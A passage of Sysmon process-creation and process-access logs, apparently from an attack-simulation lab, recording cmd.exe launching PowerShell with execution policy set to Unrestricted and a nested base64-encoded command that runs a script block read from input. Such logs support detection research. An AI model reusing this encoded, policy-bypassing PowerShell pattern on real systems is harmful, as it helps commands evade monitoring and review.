UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:17.031","ProcessGuid":"{E2A3D6B1-11D5-5F25-0000-0010200F0800}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","FileVersion":"10.0.14393.206 (rs1_release.160915-0644)","Description":"Windows PowerShell","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"PowerShell.EXE","CommandLine":"PowerShell  -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{E2A3D6B1-11D4-5F25-0000-00205F0B0800}","LogonId":"0x80b5f","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453","ParentProcessGuid":"{E2A3D6B1-11D5-5F25-0000-0010550E0800}","ParentProcessId":"4992","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"C:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=","EventReceivedTime":"2020-08-01 06:55:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5516,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:17.025\r\nSourceProcessGUID: {E2A3D6B1-11D5-5F25-0000-0010550E0800}\r\nSourceProcessId: 4992\r\nSourceThreadId: 2908\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {E2A3D6B1-11D5-5F25-0000-0010200F0800}\r\nTargetProcessId: 4740\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:17.025","SourceProcessGUID":"{E2A3D6B1-11D5-5F25-0000-0010550E0800}","SourceProcessId":"4992","SourceThreadId":"2908","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{E2A3D6B1-11D5-5F25-0000-0010200F0800}","TargetProcessId":"4740","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5517,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:17.025\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-11D5-5F25-0000-0010200F0800}\r\nTargetProcessId: 4740\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:17.025","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-11D5-5F25-0000-0010200F0800}","TargetProcessId":"4740","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:55:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5518,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:17.025\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:17.025","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5519,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:17.025\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:17.025","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
